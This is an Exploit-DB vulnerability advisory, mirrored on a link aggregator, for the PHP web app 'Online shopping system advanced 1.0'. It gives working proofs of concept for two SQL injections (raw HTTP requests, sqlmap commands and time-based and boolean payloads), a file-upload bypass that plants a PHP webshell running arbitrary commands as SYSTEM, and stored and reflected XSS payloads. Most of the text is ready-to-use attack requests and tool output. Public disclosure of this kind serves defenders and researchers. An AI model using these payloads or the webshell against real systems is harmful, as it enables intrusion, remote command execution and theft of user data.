4
[webapps] Online shopping system advanced 1.0 - Multiple Vulnerabilities
source link: https://www.exploit-db.com/exploits/51103
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Online shopping system advanced 1.0 - Multiple Vulnerabilities
# Exploit Title: Online shopping system advanced 1.0 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage:
https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link :
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
php 5.X/7.X + MySQL
# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
vulnerabilities
# Vulnerability Type: SQL Injection - #1
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the admin/edit_user.php, user_id parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id
(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115
HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: SQL Injection - #2
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the action.php, proId parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1
addToCart=1&proId=70
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId
POST parameter 'proId' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
---
Parameter: proId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434
Vulnerability description: File Restriction Bypass vulnerabilities were
found in Online shopping system advanced v1.0. This allows for an
authenticated user to potentially obtain RCE via webshell.
Proof of concept:
1. Go the add product >> (admin/add_product.php)
2.- Select product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.php
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'
Example exploitation request:
====================================================================================================
POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"
Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"
-----------------------------184982084830387--
====================================================================================================
6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell
Ex:
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
nt authority\system
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in
multiple parameter.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in
multiple parameter.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
in page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK